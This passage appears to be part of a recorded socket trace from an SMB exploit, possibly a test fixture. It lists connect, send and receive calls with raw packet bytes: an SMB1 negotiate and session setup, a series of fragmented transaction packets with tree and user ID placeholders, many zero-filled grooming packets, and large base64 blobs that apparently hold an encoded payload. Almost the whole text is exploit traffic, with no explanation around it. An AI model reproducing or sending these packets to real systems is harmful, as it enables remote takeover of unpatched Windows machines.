UVuiwGaf989u6seK2ER1R+aoJtvES8V0Zsx6slbdWrGxe4P62uwFxXStC/+qpCauvw/qpZvZo9wb458ezftwsbuOUYNlMWgBno/tWp5iSKfApu/I3RbVgaE3OmiLNYN3jw0gC5cT5tZZvDw9cBmHGcaVuvs+JAbsWoEsUaZd3R3Mn/1c1xYAumA/0VVaASNuohaU+8CmGSpny9/6ngCdejX4X//UMPKFxhlfaDnGbhbgr58SbJnYZ8KVeABMJeRJeLSP1f2AtrbAR8jSk5UgNllJcWnf+EM/Gyzh5DH0RqsyNfEbXNTxRzla1zNfWz0bB4fqzrdNNfNXvtTv9FWqyXCEHLhOz9p7JXzJBBUd0OR9rg8DFXIyNXMHCfeX5v/e2cDPWn7sSP1HU8sivMdWSP79eiYWZ6DOYjDkYmaBrFWuOKpwLyotORDEi1GMahE7btGFTN2IMgml2b9wZvqSuc7aAciGNkl7+NgmkG9r323QqSJrjCgp+DJ9URAkHRp/ovZWeh65j6G5mVS3o3Ux5cH2pfT/VZm8xsBsr1o
2YKlVmsY6mPAOnlmaEwFLrPTm5WIYnd0yOc3abTlt6R1RfwenXgqn5K1K6Uq5o7T+KblzWV1TXo0zTIBD/CwnKbkITPd7GkK+fG/pVTIAGxuI84OwkE6U9/WO3niv3bgLtebI/5Oj2ESIrNTwBRdIGzDYcK1VTlSYl0RMsMMZvWqZAhNBs9xfpyBgzAn+5NpIUwKnm6HS2UbNab6SQIQF53r0+Rx8w7xZkOEayDuGvPQ32Y7zfHtM8o8wsNxWPtI1zCcMUyHPA3zAeGkKIy51j911mdZeLmlXULTazhCdl+lYNd6aoUthPLUew6ng+vSLSxqF1N7+/bFkcWd5vuCPigEKxEg+X3d+JviOJaI9GJ2HWIT8ehFzv6JP7ymkH0XaHYKIXXDbGpMhJWmZzOd+KeEt4MY6Be95bnyjLPxR8Htcc2E35+8q074yiBdThfaOMI18K65supem5lEgTe2lQdQurhhNhgbmYPpmWsSerB8R4CiDHQg6B1xxN9lpUnCWCn37Ib9vdQ2V90almoOSh5FfBxJiPIERqxvWkHqv3h/c0c8MZ3kLJi/+5PD+F/rT0hmgD1lUoqZ9KfEAB/ivMQzIbMnhoJ6DpDZwXvWgYON+Ti4Of8cD3JVZFHKCPtFO1LWNuXu9DHS0cChPvbPTNgL1fuz3hWniAOjJxyXhilxEmUKoCuaHrjL7/mCwA8mUTF8nZfDOYFw/CN4ol8UuKSKKNotx6s4EGyOXAGxRTqQw5Rqr70SWFUVy18EO3TCMj/3eC7HjDV7CAh6+160YbDs53m7AehAx+OlUNq01wPuaxFfSqlgcUG+9Rn1b/Xp1jvWeSkCNdYiiiXi1XwsMrdhKZGKroSXSSJclExe6ZgcNNPa/HgjvXbwtmRkgiGneql4mBYmKDzcXCkp/tjnL6/KriY81gMHN4G9ulMunxVyF8wybDcifTOxtarjLXVRuC1Y7vzYaEuHT\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x13\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0#\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER
__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd03\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0C\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0S\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0c\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0s\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\
\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x83\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x93\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xa3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xb3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xc3\\\\x00\\\\x00\\\\x
00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xd3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xe3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('connect', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('send', 2, 
b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00-\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf0\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('connect', 3, 0.0)\", \"('connect', 4, 0.0)\", \"('send', 3, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 5, 0.0)\", \"('send', 4, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 6, 0.0)\", \"('send', 6, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 7, 0.0)\", \"('connect', 8, 0.0)\", \"('send', 7, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, 
